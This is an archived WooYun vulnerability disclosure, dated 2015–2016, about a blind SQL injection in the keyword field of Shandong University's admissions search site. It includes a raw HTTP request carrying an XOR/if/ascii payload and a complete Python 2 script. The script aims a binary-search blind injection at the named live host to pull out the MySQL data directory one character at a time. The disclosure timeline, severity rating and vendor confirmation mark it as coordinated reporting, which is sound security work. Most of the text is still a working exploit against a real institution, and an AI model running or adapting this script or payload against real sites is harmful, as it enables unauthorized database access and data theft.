乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-11: 细节已通知厂商并且等待厂商处理中 2015-12-12: 厂商已经确认,细节仅向厂商公开 2015-12-22: 细节向核心白帽子及相关领域专家公开 2016-01-01: 细节向普通白帽子公开 2016-01-11: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
山东大学一处注入漏洞附脚本
POST /search HTTP/1.1Content-Length: 61Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.bkzs.sdu.edu.cnCookie: JSESSIONID=5FE2DD4B830F1A5863F1D7E5B6947DEE;SERVERID=d6b1c6187f7b39e92c6c281a5ffce854|1444727923|1444727923Host: www.bkzs.sdu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)Chrome/41.0.2228.0 Safari/537.21Accept: */*btn=1&keyword='XOR(if(ascii(mid(@@datadir,1,1))>10,1,0))OR'
keyword存在注入脚本:
#coding=utf-8import sys,urllib2from optparse import OptionParserfrom urllib2 import Request,urlopen,URLError,HTTPErrorimport urllibresult=''def request(URL,data): #print URL user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, data, user_agent) try: request = urllib2.urlopen(req) except HTTPError, e: if e.code == 500: return 'Runtime Error' except URLError, e: #print('[!] We failed to reach a server.') #print('[!] Reason: ' + str(e.reason)) sys.exit(1) return request.read()def binary_sqli(left, right, index): global result while 1: mid = (left + right)/2 if (right-left==1): result += chr(right) print 'datadir: ' ,result break payload = "'XOR(if(ascii(mid(@@datadir,%s,1))>%s,1,0))OR'" % (index, mid) param = {'keyword': payload,'btn':'1'} print payload html = request('http://www.bkzs.sdu.edu.cn/search',urllib.urlencode(param)) # print html verify = 'datadir' if verify not in html: left = mid else: right = midif __name__ == '__main__': for i in range(1,25): binary_sqli(32, 127, i)
获取datadir
过滤
危害等级:高
漏洞Rank:14
确认时间:2015-12-12 12:34
已通报系统所属单位
暂无